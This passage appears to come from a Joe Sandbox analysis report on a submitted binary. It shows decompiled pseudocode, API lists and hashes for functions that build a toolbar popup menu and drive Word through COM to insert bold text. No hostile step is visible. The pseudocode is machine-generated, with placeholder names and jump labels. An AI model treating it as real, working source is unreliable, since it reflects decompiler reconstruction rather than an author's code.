				E009A876D(0, _t402 - 0xec, _t394, 0xffffffff);
				_t395 = E009AC937(0, _t402 - 0xec, _t392, _t394, _t398, _t405,  *_t398);
				 *(_t402 - 0xf0) = _t395;
				if(E009A879C(0, _t402 - 0xec, _t392, _t395, _t398, "ReBarWindow32") != 0 || _t395 == 0 || E009BB8BA(_t395, 0xadb498) == 0) {
					L54:
					E009A5510( *((intOrPtr*)(_t402 - 0xec)) + 0xfffffff0, _t392);
					__eflags = 0;
				} else {
					_t217 = E009AD813(_t395);
					if(_t217 == 0) {
						L7:
						 *(_t402 - 0x20) = 0;
						 *((intOrPtr*)(_t402 - 0x1c)) = 0;
						 *(_t402 - 0x18) = 0;
						 *((intOrPtr*)(_t402 - 0x14)) = 0;
						 *(_t402 - 0x40) = 0;
						 *((intOrPtr*)(_t402 - 0x3c)) = 0;
						 *((intOrPtr*)(_t402 - 0x38)) = 0;
						 *((intOrPtr*)(_t402 - 0x34)) = 0;
						 *(_t402 - 0x50) = 0;
						 *((intOrPtr*)(_t402 - 0x4c)) = 0;
						 *((intOrPtr*)(_t402 - 0x48)) = 0;
						 *((intOrPtr*)(_t402 - 0x44)) = 0;
						E009BC2D5(0, _t402 - 0x150, _t392, _t398, __eflags);
						 *((char*)(_t402 - 4)) = 1;
						E009A5D70(_t402 - 0xfc, _t392, E009B9D52());
						 *((char*)(_t402 - 4)) = 2;
						E009A5D70(_t402 - 0xf4, _t392, E009B9D52());
						 *((char*)(_t402 - 4)) = 3;
						E009BA639(_t402 - 0x140);
						_push( *((intOrPtr*)(_t402 - 0x100)));
						 *((char*)(_t402 - 4)) = 4;
						E009BADDE(0, _t402 - 0x164, _t392, _t395, _t398, __eflags);
						 *(_t402 - 0xe4) =  *((intOrPtr*)(_t395 + 0xb8));
						_t395 = SendMessageA;
						 *((char*)(_t402 - 4)) = 5;
						 *((intOrPtr*)(_t402 - 0xe0)) = 0x10;
						SendMessageA( *0x00000020, 0x41d,  *(_t398 + 0xc), _t402 - 0xe4);
						SendMessageA( *( *(_t402 - 0xf0) + 0x20), 0x409,  *(_t398 + 0xc), _t402 - 0x20);
						 *(_t402 - 0xf8) = lstrlenA("ToolbarWindow32") + 1;
						GetClassNameA( *(_t402 - 0xc4), E009A5F20(0, _t402 - 0xec, _t392, SendMessageA, lstrlenA("ToolbarWindow32") + 1),  *(_t402 - 0xf8));
						E009A876D(0, _t402 - 0xec, SendMessageA, 0xffffffff);
						 *(_t402 - 0x104) = E009AC937(0, _t402 - 0xec, _t392, SendMessageA, _t398, __eflags,  *(_t402 - 0xc4));
						__eflags = E009A879C(0, _t402 - 0xec, _t392, _t395, _t398, "ToolbarWindow32");
						if(__eflags != 0) {
							L53:
							 *((char*)(_t402 - 4)) = 4;
							E009BAE32(0, _t402 - 0x164, _t392, _t395, _t398, __eflags);
							 *((char*)(_t402 - 4)) = 3;
							E009BADC5(_t402 - 0x140);
							E009A5510( *((intOrPtr*)(_t402 - 0xf4)) + 0xfffffff0, _t392);
							__eflags =  *((intOrPtr*)(_t402 - 0xfc)) + 0xfffffff0;
							E009A5510( *((intOrPtr*)(_t402 - 0xfc)) + 0xfffffff0, _t392);
							 *((char*)(_t402 - 4)) = 0;
							E009A9488(0, _t402 - 0x150, _t395, _t398, __eflags);
							goto L54;
						} else {
							_t362 =  *(_t402 - 0x104);
							__eflags =  *(_t402 - 0x104);
							if(__eflags == 0) {
								goto L53;
							} else {
								__eflags = E009BB8BA(_t362, 0xadb464);
								if(__eflags == 0) {
									goto L53;
								} else {
									_t399 = _t398 + 0x18;
									__eflags = _t399;
									 *(_t402 - 0x18) = _t399->left;
									 *(_t402 - 0x130) = _t399;
									E009BAAE4( *(_t402 - 0xf0), _t402 - 0x20);
									_t400 =  *(_t402 - 0x104);
									E009BAAA3(_t400, _t402 - 0x20);
									_t249 = SendMessageA( *(_t400 + 0x20), 0x418, 0, 0);
									 *(_t402 - 0xf0) = _t249;
									 *(_t402 - 0xe8) = _t249;
									while(1) {
										 *(_t402 - 0xe8) =  *(_t402 - 0xe8) - 1;
										SendMessageA( *(_t400 + 0x20), 0x41d,  *(_t402 - 0xe8), _t402 - 0x40);
										_t255 = IntersectRect(_t402 - 0x50, _t402 - 0x20, _t402 - 0x40);
										__eflags = _t255;
										if(_t255 != 0) {
											break;
										}
										__eflags =  *(_t402 - 0xe8);
										if( *(_t402 - 0xe8) > 0) {
											continue;
										}
										break;
									}
									_t396 = 0x30;
									E00AAB3F0(_t402 - 0x194, 0, _t396);
									 *(_t402 - 0x194) = _t396;
									 *(_t402 - 0xf8) = E009A6C17(_t400);
									E009BBEBF(_t402 - 0x118);
									 *((intOrPtr*)(_t402 - 0x118)) = 0xad7b6c;
									 *((char*)(_t402 - 4)) = 6;
									E009FAFE6(_t402 - 0x118,  *(_t402 - 0xf0) -  *(_t402 - 0xe8), 0xffffffff);
									E009BC092(0, _t402 - 0x150, _t392, _t396, CreatePopupMenu());
									E009BAD44(0, _t402 - 0x140, _t392, _t396, CreateCompatibleDC( *(_t402 - 0x160)));
									_t398 = 0;
									while(1) {
										__eflags =  *(_t402 - 0xe8) -  *(_t402 - 0xf0);
										if(__eflags >= 0) {
											break;
										}
										E009C2610( *(_t402 - 0x104), _t392, __eflags,  *(_t402 - 0xe8), _t402 - 0x11c, _t402 - 0x12c, _t402 - 0x120);
										__eflags =  *(_t402 - 0x12c) & 0x00000001;
										if(( *(_t402 - 0x12c) & 0x00000001) != 0) {
											__eflags = _t398;
											if(_t398 != 0) {
												 *((intOrPtr*)(_t402 - 0x190)) = 0x100;
												 *((intOrPtr*)(_t402 - 0x18c)) = 0x800;
												goto L42;
											}
											goto L43;
										} else {
											_t395 =  *(_t402 - 0x11c);
											_push( *(_t402 - 0x11c));
											 *((intOrPtr*)(_t402 - 0x190)) = 0x162;
											_t274 = E009BE51C();
											__eflags = _t274;
											if(_t274 == 0) {
												L18:
												E009A5DC0(_t402 - 0xf4);
											} else {
												_t312 = E009A8DDD(_t402 - 0xfc, _t392, _t274, _t395);
												__eflags = _t312;
												if(_t312 == 0) {
													goto L18;
												} else {
													E009BE527(0, _t402 - 0xf4,  *((intOrPtr*)(_t402 - 0xfc)), 1, 0xa);
												}
											}
											_t276 = E009A6291(__eflags, 8);
											__eflags = _t276;
											if(_t276 == 0) {
												_t276 = 0;
												__eflags = 0;
											} else {
												 *((intOrPtr*)(_t276 + 4)) = 0;
												 *_t276 = 0xad7e64;
											}
											E009FB10C(_t402 - 0x118, _t398, _t276);
											_t278 =  *(_t402 - 0xf8);
											__eflags = _t278;
											if(__eflags == 0) {
												L38:
												 *(_t402 - 0x174) = 0;
												goto L39;
											} else {
												_push(_t402 - 0x80);
												_push( *((intOrPtr*)(_t402 - 0x120)));
												_push( *((intOrPtr*)(_t278 + 4)));
												_t284 = E009A8647(0,  *((intOrPtr*)( *((intOrPtr*)(E009BD77F(0, _t395, _t398, __eflags) + 0x78)))), _t395, _t398, __eflags);
												__eflags = _t284;
												if(_t284 == 0) {
													goto L38;
												} else {
													CopyRect(_t402 - 0x30, _t402 - 0x70);
													_t372 =  ~( *(_t402 - 0x30));
													OffsetRect(_t402 - 0x30,  ~( *(_t402 - 0x30)),  ~( *(_t402 - 0x2c)));
													__eflags = _t398;
													if(__eflags < 0) {
														L52:
														E009B8782(_t372);
														goto L53;
													} else {
														__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
														if(__eflags >= 0) {
															goto L52;
														} else {
															_t395 = _t398;
															 *(_t402 - 0x128) =  *( *(_t402 - 0x114) + _t395 * 4);
															_t295 = CreateCompatibleBitmap( *(_t402 - 0x160),  *(_t402 - 0x28),  *(_t402 - 0x24));
															_t372 =  *(_t402 - 0x128);
															E009BB018(0,  *(_t402 - 0x128), _t392, _t395, _t295);
															__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
															if(__eflags >= 0) {
																goto L52;
															} else {
																_t298 =  *( *(_t402 - 0x114) + _t395 * 4);
																__eflags = _t298;
																if(_t298 != 0) {
																	_t299 =  *((intOrPtr*)(_t298 + 4));
																} else {
																	_t299 = 0;
																}
																_t300 = E009BB0A9( *((intOrPtr*)(_t402 - 0x13c)), _t299);
																__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
																if(__eflags >= 0) {
																	goto L52;
																} else {
																	 *( *(_t402 - 0x114) + _t395 * 4) = _t300;
																	_t301 = GetSysColor(4);
																	_t372 = _t402 - 0x140;
																	E009C1FF9(_t402 - 0x140, _t402 - 0x30, _t301);
																	E009A86F4(_t402 - 0x140,  *((intOrPtr*)( *(_t402 - 0xf8) + 4)),  *((intOrPtr*)(_t402 - 0x120)),  *((intOrPtr*)(_t402 - 0x13c)), 0, 0, 1);
																	__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
																	if(__eflags >= 0) {
																		goto L52;
																	} else {
																		_t307 =  *( *(_t402 - 0x114) + _t395 * 4);
																		__eflags = _t307;
																		if(_t307 != 0) {
																			_t308 =  *((intOrPtr*)(_t307 + 4));
																		} else {
																			_t308 = 0;
																		}
																		_t309 = E009BB0A9( *((intOrPtr*)(_t402 - 0x13c)), _t308);
																		__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
																		if(__eflags >= 0) {
																			goto L52;
																		} else {
																			_t372 =  *(_t402 - 0x114);
																			 *( *(_t402 - 0x114) + _t395 * 4) = _t309;
																			__eflags = _t398 -  *((intOrPtr*)(_t402 - 0x110));
																			if(__eflags >= 0) {
																				goto L52;
																			} else {
																				 *(_t402 - 0x174) =  *( *(_t402 - 0x114) + _t395 * 4);
																				L39:
																				 *((intOrPtr*)(_t402 - 0x170)) =  *((intOrPtr*)(_t402 - 0xf4));
																				 *(_t402 - 0x184) =  *(_t402 - 0x11c);
																				 *((intOrPtr*)(_t402 - 0x18c)) = 0x100;
																				_t398 = _t398 + 1;
																				L42:
																				InsertMenuItemA( *(_t402 - 0x14c),  *(_t402 - 0xe8), 1, _t402 - 0x194);
																				L43:
																				_t165 = _t402 - 0xe8;
																				 *_t165 =  *(_t402 - 0xe8) + 1;
																				__eflags =  *_t165;
																				continue;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
										goto L55;
									}
									CopyRect(_t402 - 0x60,  *(_t402 - 0x130));
									E009BAAE4( *((intOrPtr*)(_t402 - 0x100)), _t402 - 0x60);
									_t372 = _t402 - 0x150;
									E009ABA60(_t402 - 0x150, __eflags, 0,  *(_t402 - 0x60),  *((intOrPtr*)(_t402 - 0x54)),  *((intOrPtr*)(_t402 - 0x100)), 0);
									_t395 = 0;
									 *((intOrPtr*)( *((intOrPtr*)(_t402 - 0x124)))) = 0;
									__eflags = _t398;
									if(__eflags <= 0) {
										L51:
										 *((char*)(_t402 - 4)) = 5;
										E009BBED6(_t402 - 0x118);
										 *((char*)(_t402 - 4)) = 4;
										E009BAE32(0, _t402 - 0x164, _t392, _t395, _t398, __eflags);
										 *((char*)(_t402 - 4)) = 3;
										E009BADC5(_t402 - 0x140);
										E009A5510( *((intOrPtr*)(_t402 - 0xf4)) + 0xfffffff0, _t392);
										E009A5510( *((intOrPtr*)(_t402 - 0xfc)) + 0xfffffff0, _t392);
										 *((char*)(_t402 - 4)) = 0;
										E009A9488(0, _t402 - 0x150, _t395, _t398, __eflags);
										_t398 = 1;
										goto L6;
									} else {
										while(1) {
											__eflags = _t395;
											if(__eflags < 0) {
												goto L52;
											}
											__eflags = _t395 -  *((intOrPtr*)(_t402 - 0x110));
											if(__eflags >= 0) {
												goto L52;
											} else {
												_t372 =  *( *(_t402 - 0x114) + _t395 * 4);
												__eflags = _t372;
												if(_t372 != 0) {
													 *((intOrPtr*)( *_t372 + 4))(1);
												}
												_t395 = _t395 + 1;
												__eflags = _t395 - _t398;
												if(__eflags < 0) {
													continue;
												} else {
													goto L51;
												}
											}
											goto L55;
										}
										goto L52;
									}
								}
							}
						}
					} else {
						_t410 =  *((intOrPtr*)(_t402 - 0x100)) - _t217;
						if( *((intOrPtr*)(_t402 - 0x100)) == _t217) {
							goto L7;
						} else {
							_t398 = E009A96B5(0, _t217, _t392, _t395, _t398, _t410,  *((intOrPtr*)(_t402 + 8)), _t398,  *((intOrPtr*)(_t402 - 0x124)));
							L6:
							E009A5510( *((intOrPtr*)(_t402 - 0xec)) + 0xfffffff0, _t392);
						}
					}
				}
				L55:
				return E00AAD31E(0, _t395, _t398);
			}


























      0x009a96b5
      0x009a96b5
      0x009a96b5
      0x009a96bf
      0x009a96c7
      0x009a96ca
      0x009a96d0
      0x009a96e2
      0x009a96ee
      0x009a96f7
      0x009a96f7
      0x009a970a
      0x009a9718
      0x009a9724
      0x009a9731
      0x009a973e
      0x009a9d9e
      0x009a9da7
      0x009a9dac
      0x009a9760
      0x009a9762
      0x009a9769
      0x009a979b
      0x009a97a1
      0x009a97a4
      0x009a97a7
      0x009a97aa
      0x009a97ad
      0x009a97b0
      0x009a97b3
      0x009a97b6
      0x009a97b9
      0x009a97bc
      0x009a97bf
      0x009a97c2
      0x009a97c5
      0x009a97ca
      0x009a97da
      0x009a97df
      0x009a97ef
      0x009a97fa
      0x009a97fe
      0x009a9803
      0x009a980f
      0x009a9813
      0x009a9825
      0x009a9837
      0x009a983d
      0x009a9841
      0x009a984b
      0x009a9863
      0x009a9878
      0x009a9890
      0x009a989e
      0x009a98b9
      0x009a98c4
      0x009a98c6
      0x009a9d56
      0x009a9d5c
      0x009a9d60
      0x009a9d6b
      0x009a9d6f
      0x009a9d7d
      0x009a9d88
      0x009a9d8b
      0x009a9d96
      0x009a9d99
      0x00000000
      0x009a98cc
      0x009a98cc
      0x009a98d2
      0x009a98d4
      0x00000000
      0x009a98da
      0x009a98e4
      0x009a98e6
      0x00000000
      0x009a98ec
      0x009a98f2
      0x009a98f2
      0x009a98f7
      0x009a98fe
      0x009a9904
      0x009a9909
      0x009a9915
      0x009a9924
      0x009a9926
      0x009a992c
      0x009a9932
      0x009a9932
      0x009a994a
      0x009a9958
      0x009a995e
      0x009a9960
      0x00000000
      0x00000000
      0x009a9962
      0x009a9968
      0x00000000
      0x00000000
      0x00000000
      0x009a9968
      0x009a996c
      0x009a9976
      0x009a9980
      0x009a9991
      0x009a9997
      0x009a999c
      0x009a99bb
      0x009a99bf
      0x009a99d1
      0x009a99e9
      0x009a99ee
      0x009a9c6f
      0x009a9c75
      0x009a9c7b
      0x00000000
      0x00000000
      0x009a9a16
      0x009a9a1b
      0x009a9a22
      0x009a9c36
      0x009a9c38
      0x009a9c3a
      0x009a9c44
      0x00000000
      0x009a9c44
      0x00000000
      0x009a9a28
      0x009a9a28
      0x009a9a2e
      0x009a9a2f
      0x009a9a39
      0x009a9a3e
      0x009a9a40
      0x009a9a6b
      0x009a9a71
      0x009a9a42
      0x009a9a4a
      0x009a9a4f
      0x009a9a51
      0x00000000
      0x009a9a53
      0x009a9a64
      0x009a9a64
      0x009a9a51
      0x009a9a78
      0x009a9a7e
      0x009a9a80
      0x009a9a8d
      0x009a9a8d
      0x009a9a82
      0x009a9a82
      0x009a9a85
      0x009a9a85
      0x009a9a97
      0x009a9a9c
      0x009a9aa2
      0x009a9aa4
      0x009a9c0b
      0x009a9c0b
      0x00000000
      0x009a9aaa
      0x009a9ab0
      0x009a9ab1
      0x009a9ab7
      0x009a9ac2
      0x009a9ac7
      0x009a9ac9
      0x00000000
      0x009a9acf
      0x009a9ad7
      0x009a9ae6
      0x009a9aed
      0x009a9af3
      0x009a9af5
      0x009a9d51
      0x009a9d51
      0x00000000
      0x009a9afb
      0x009a9afb
      0x009a9b01
      0x00000000
      0x009a9b07
      0x009a9b13
      0x009a9b1e
      0x009a9b24
      0x009a9b2a
      0x009a9b31
      0x009a9b36
      0x009a9b3c
      0x00000000
      0x009a9b42
      0x009a9b48
      0x009a9b4b
      0x009a9b4d
      0x009a9b53
      0x009a9b4f
      0x009a9b4f
      0x009a9b4f
      0x009a9b5d
      0x009a9b62
      0x009a9b68
      0x00000000
      0x009a9b6e
      0x009a9b76
      0x009a9b79
      0x009a9b84
      0x009a9b8a
      0x009a9ba8
      0x009a9bad
      0x009a9bb3
      0x00000000
      0x009a9bb9
      0x009a9bbf
      0x009a9bc2
      0x009a9bc4
      0x009a9bca
      0x009a9bc6
      0x009a9bc6
      0x009a9bc6
      0x009a9bd4
      0x009a9bd9
      0x009a9bdf
      0x00000000
      0x009a9be5
      0x009a9be5
      0x009a9beb
      0x009a9bee
      0x009a9bf4
      0x00000000
      0x009a9bfa
      0x009a9c03
      0x009a9c11
      0x009a9c17
      0x009a9c23
      0x009a9c29
      0x009a9c33
      0x009a9c4e
      0x009a9c63
      0x009a9c69
      0x009a9c69
      0x009a9c69
      0x009a9c69
      0x00000000
      0x009a9c69
      0x009a9bf4
      0x009a9bdf
      0x009a9bb3
      0x009a9b68
      0x009a9b3c
      0x009a9b01
      0x009a9af5
      0x009a9ac9
      0x009a9aa4
      0x00000000
      0x009a9a22
      0x009a9c8b
      0x009a9c9b
      0x009a9ca7
      0x009a9cb4
      0x009a9cbf
      0x009a9cc1
      0x009a9cc3
      0x009a9cc5
      0x009a9cf2
      0x009a9cf8
      0x009a9cfc
      0x009a9d07
      0x009a9d0b
      0x009a9d16
      0x009a9d1a
      0x009a9d28
      0x009a9d36
      0x009a9d41
      0x009a9d44
      0x009a9d4b
      0x00000000
      0x009a9cc7
      0x009a9cc7
      0x009a9cc7
      0x009a9cc9
      0x00000000
      0x00000000
      0x009a9ccf
      0x009a9cd5
      0x00000000
      0x009a9cd7
      0x009a9ce0
      0x009a9ce2
      0x009a9ce4
      0x009a9cea
      0x009a9cea
      0x009a9ced
      0x009a9cee
      0x009a9cf0
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009a9cf0
      0x00000000
      0x009a9cd5
      0x00000000
      0x009a9cc7
      0x009a9cc5
      0x009a98e6
      0x009a98d4
      0x009a976b
      0x009a976b
      0x009a9771
      0x00000000
      0x009a9773
      0x009a9784
      0x009a9786
      0x009a978f
      0x009a9794
      0x009a9771
      0x009a9769
      0x009a9dae
      0x009a9db3

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009A96BF
      • lstrlenA.KERNEL32(ReBarWindow32,00000000,00000188), ref: 009A96F1
      • GetClassNameA.USER32(?,00000000,00000001), ref: 009A970A
        • Part of subcall function 009A876D: _strnlen.LIBCMT ref: 009A8788
      • SendMessageA.USER32 ref: 009A984B
      • SendMessageA.USER32 ref: 009A9863
      • lstrlenA.KERNEL32(ToolbarWindow32), ref: 009A986A
      • GetClassNameA.USER32(?,00000000,?), ref: 009A9890
      • SendMessageA.USER32 ref: 009A9924
      • SendMessageA.USER32 ref: 009A994A
      • IntersectRect.USER32 ref: 009A9958
      • _memset.LIBCMT ref: 009A9976
      • CreatePopupMenu.USER32(?,000000FF), ref: 009A99C4
      • CreateCompatibleDC.GDI32(?), ref: 009A99DC
      • CopyRect.USER32 ref: 009A9AD7
      • OffsetRect.USER32(?,?,?), ref: 009A9AED
      • CreateCompatibleBitmap.GDI32(?,?,?), ref: 009A9B24
      • GetSysColor.USER32(00000004), ref: 009A9B79
      • InsertMenuItemA.USER32(?,?,00000001,?), ref: 009A9C63
      • CopyRect.USER32 ref: 009A9C8B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MessageRectSend$Create$ClassCompatibleCopyMenuNamelstrlen$BitmapColorH_prolog3_InsertIntersectItemOffsetPopup_memset_strnlen
      • String ID: ReBarWindow32$ToolbarWindow32
      • API String ID: 1783801815-2283011909
      • Opcode ID: 0ecbe6bdf426420eeca42443f52f86f99f1ebf69f76114c55699551ee43dea71
      • Instruction ID: fd01f606dc73447466f78d8adc1ddcb56f6ca53c3626ba14e6ed45cb0c76f485
      • Opcode Fuzzy Hash: 0ecbe6bdf426420eeca42443f52f86f99f1ebf69f76114c55699551ee43dea71
      • Instruction Fuzzy Hash: BF1218719001299BCF25EFA4CD85BEDB7B9BF49300F0045D9E60AA7291DB309E85CFA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A41D0 Relevance: 37.0, APIs: 11, Strings: 10, Instructions: 205comCOMMON
      Download Yara Rule
      C-Code - Quality: 28%
      			E009A41D0(void* __ecx, char* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v72;
				char _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr _t57;
				char* _t58;
				intOrPtr* _t61;
				intOrPtr* _t84;
				void* _t89;
				intOrPtr* _t104;
				void* _t127;
				intOrPtr* _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				intOrPtr* _t132;
				intOrPtr* _t139;

				_t111 = __edx;
				_t55 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t55 ^ _t130;
				_t57 = _a4;
				_t129 = __ecx;
				_v64 = _t57;
				__imp__CoInitialize(0);
				__imp__CLSIDFromProgID(L"Word.Application",  &_v24);
				if(_t57 >= 0) {
					_t111 =  &_v44;
					_t58 =  &_v24;
					_v44 = 0;
					__imp__CoCreateInstance(_t58, 0, 4, 0xad89ac,  &_v44);
					if(_t58 < 0) {
						goto L1;
					} else {
						_t132 = _t131 - 0x10;
						_t61 = _t132;
						_v40 = 3;
						 *_t61 = _v40;
						 *((intOrPtr*)(_t61 + 4)) = _v36;
						 *((intOrPtr*)(_t61 + 8)) = 1;
						 *((intOrPtr*)(_t61 + 0xc)) = _v28;
						E009A4050();
						_t128 = __imp__#8;
						 *_t128(0, _v44, L"Visible", 1);
						E009A4050(_t129, 2,  &_v60, _v44, L"Documents", 0,  &_v60);
						 *_t128();
						E009A4050(_t129, 1,  &_v40, _v52, L"Add", 0,  &_v40);
						 *_t128();
						E009A4050(_t129, 2,  &_v60, _v32, L"Paragraphs", 0,  &_v60);
						 *_t128();
						E009A4050(_t129, 1,  &_v40, _v52, L"Add", 0,  &_v40);
						 *_t128();
						E009A4050(_t129, 2,  &_v60, _v32, L"Range", 0,  &_v60);
						_t90 = _v52;
						_v40 = 8;
						__imp__#2();
						_t139 = _t132 + 0xa0 - 0x10;
						_t104 = _t139;
						 *_t104 = _v40;
						 *((intOrPtr*)(_t104 + 4)) = _v36;
						 *((intOrPtr*)(_t104 + 8)) = 8;
						_v32 = 8;
						 *((intOrPtr*)(_t104 + 0xc)) = _v28;
						E009A4050(_t129, 4, 0, _v52, L"Text", 1, _v64);
						__imp__#9();
						 *_t128();
						E009A4050(_t129, 2,  &_v80, _v52, L"Font", 0,  &_v80);
						_t84 = _t139 + 0x30;
						_v40 = 3;
						 *_t84 = _v40;
						 *((intOrPtr*)(_t84 + 4)) = _v36;
						 *((intOrPtr*)(_t84 + 8)) = 1;
						 *((intOrPtr*)(_t84 + 0xc)) = _v28;
						E009A4050(_t129, 4, 0, _v72, L"Bold", 1,  &_v40);
						E009A4050(_t129, 1, 0, _t90, L"InsertParagraphAfter", 0, __ecx);
						return E00AAB46A(0, _t90, _v8 ^ _t130, _v72, _t128, _t129, 4);
					}
				} else {
					L1:
					return E00AAB46A(1, _t89, _v8 ^ _t130, _t111, _t127, _t129);
				}
			}
































      0x009a41d0
      0x009a41d6
      0x009a41dd
      0x009a41e0
      0x009a41e8
      0x009a41ea
      0x009a41ed
      0x009a41fc
      0x009a4204
      0x009a421b
      0x009a4228
      0x009a422c
      0x009a4233
      0x009a423b
      0x00000000
      0x009a423d
      0x009a423d
      0x009a4240
      0x009a4247
      0x009a424e
      0x009a4255
      0x009a4268
      0x009a4271
      0x009a4274
      0x009a4279
      0x009a4286
      0x009a429a
      0x009a42a6
      0x009a42ba
      0x009a42c6
      0x009a42da
      0x009a42e6
      0x009a42fa
      0x009a4306
      0x009a431a
      0x009a4322
      0x009a432e
      0x009a4332
      0x009a433b
      0x009a433e
      0x009a4340
      0x009a4345
      0x009a4348
      0x009a434d
      0x009a4358
      0x009a4363
      0x009a436f
      0x009a4379
      0x009a438a
      0x009a4392
      0x009a439c
      0x009a43a3
      0x009a43aa
      0x009a43b8
      0x009a43c1
      0x009a43c4
      0x009a43d6
      0x009a43f0
      0x009a43f0
      0x009a4206
      0x009a4206
      0x009a4218
      0x009a4218

      APIs
      • CoInitialize.OLE32(00000000), ref: 009A41ED
      • CLSIDFromProgID.OLE32(Word.Application,?), ref: 009A41FC
      • CoCreateInstance.OLE32(?,00000000,00000004,00AD89AC,?), ref: 009A4233
      • VariantInit.OLEAUT32(?), ref: 009A4286
      • VariantInit.OLEAUT32(?), ref: 009A42A6
      • VariantInit.OLEAUT32(?), ref: 009A42C6
      • VariantInit.OLEAUT32(?), ref: 009A42E6
      • VariantInit.OLEAUT32(?), ref: 009A4306
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: InitVariant$CreateFromInitializeInstanceProg
      • String ID: Add$Bold$Documents$Font$InsertParagraphAfter$Paragraphs$Range$Text$Visible$Word.Application
      • API String ID: 3550150379-2794334559
      • Opcode ID: 93bd4d7b8987a1834f2f671c95f5fe302e0c7737aa4184cc4d6d6dfc2d248adc
      • Instruction ID: 8eb0012924c4ad41c0dd95bfd8262deb3f849c1fe3511fb92bce222c7a2e6e9d
      • Opcode Fuzzy Hash: 93bd4d7b8987a1834f2f671c95f5fe302e0c7737aa4184cc4d6d6dfc2d248adc
      • Instruction Fuzzy Hash: EE617871A40208BBDB14EF94DC56FDEB7B8EF88700F10845AF605BB2D1E7B169058BA5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00A37EA2 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 263windowCOMMON
      Download Yara Rule
      C-Code - Quality: 77%
      			E00A37EA2(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed long long __fp0) {
				void* _t149;
				signed int _t155;
				void* _t158;
				void* _t159;
				unsigned int _t161;
				intOrPtr _t164;
				void* _t165;
				signed int _t175;
				intOrPtr _t177;
				void* _t186;
				signed char _t188;
				signed int _t200;
				void* _t209;
				signed int _t217;
				short _t240;
				int _t247;
				signed char* _t250;
				void* _t251;
				long long* _t252;
				signed long long _t259;
				signed long long _t263;

				_t259 = __fp0;
				_t244 = __edi;
				_t237 = __edx;
				_push(0xfc);
				E00AAD29B(0xace3ca, __ebx, __edi, __esi);
				_t209 = __ecx;
				_t247 = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 1;
				 *((intOrPtr*)(__ecx + 0xc)) =  *((intOrPtr*)(_t251 + 8));
				if( *((intOrPtr*)(__ecx + 0x88)) == 0 ||  *0xd0ff5c <= 8) {
					L4:
					return E00AAD31E(_t209, _t244, _t247);
				} else {
					E009BA639(_t251 - 0xb8);
					 *(_t251 - 4) = 0;
					E009BAD44(__ecx, _t251 - 0xb8, __edx, __edi, CreateCompatibleDC(0));
					if(GetObjectA( *(_t209 + 0x88), 0x18, _t251 - 0x108) != 0) {
						_t244 = SelectObject;
						 *(_t251 - 0x94) =  *(_t251 - 0x104);
						 *(_t251 - 0xa4) =  *(_t251 - 0x100);
						_t149 =  *(_t209 + 0x88);
						__eflags = _t149;
						if(_t149 == 0) {
							 *(_t251 - 0x9c) = 0;
						} else {
							 *(_t251 - 0x9c) = SelectObject( *(_t251 - 0xb4), _t149);
						}
						__eflags =  *(_t251 - 0x9c) - _t247;
